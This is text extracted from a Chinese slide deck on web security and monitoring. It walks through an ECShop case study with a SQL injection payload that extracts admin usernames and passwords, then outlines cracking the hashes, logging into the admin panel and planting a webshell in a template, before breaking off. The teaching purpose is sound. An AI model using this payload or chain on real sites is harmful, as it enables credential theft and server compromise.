web安全讨论及监控部署-huihoo.pdfVIP

WEB安全讨论及监控部署 --作者：⻢东京 分享⼤纲 WEB 中的安全危机 WEB端安全漏洞图解 预警平台的建设和使⽤ ⽊⻢特征码实例及未来新编码⽅式 2 WEB 中的安全危机 3 WEB 中的安全危机 　　WEB应⽤中会碰到很多安全问题，但我们碰到绝⼤部分 的问题，都是因为开发⼯程师在项⺫编码时的过度⾃信及草 率⽽留下的，或者有些是未考虑到的。俗话说“千⾥之堤溃于 蚁⽳” ，往往⼀个不起眼的漏洞便会造成很严重的后果。如在 提交时对字串没有转义的处理将会导致被SQL注⼊，提权， 挂码等。 4 WEB 中的安全危机 　　在漏洞提交平台“乌云”中，每天都有接近20个安全漏洞被公布。 5 WEB 中的安全危机 6 WEB 中的安全危机 　　以国内三家较出名的互联⺴公司为例，在过去两年内，每个⽉少则出现10⼏个，多则 出现5、60个⼤⼤⼩⼩的安全漏洞。 7 • 2345也有安全问题 －　－ 8 WEB端安全漏洞图解 9 WEB端安全漏洞图解 漏洞案例分析⼀、 案例披露地址：/bugs/wooyun-2010-041650 相关⼚商：/ 10 WEB端安全漏洞图解 漏洞案例分析 注⼊选择：ECSHOP平台搜索功能 11 WEB端安全漏洞图解 搜索⻚SQL注⼊ $array[attr][1) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,\\) union select 1#\),1 from ecs_admin_user#] = 1; base64_encode(serialize($array)); /search.php?encode=YToxOntz……………… JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtpOjE 7jQ6IfX0= 12 WEB端安全漏洞图解 MD5碰撞解码 13 WEB端安全漏洞图解 进⼊ECSHOP后台地址 /admin/privilege.php?act=login 14 WEB端安全漏洞图解 修改模板注⼊webShell后⻔ ?php @e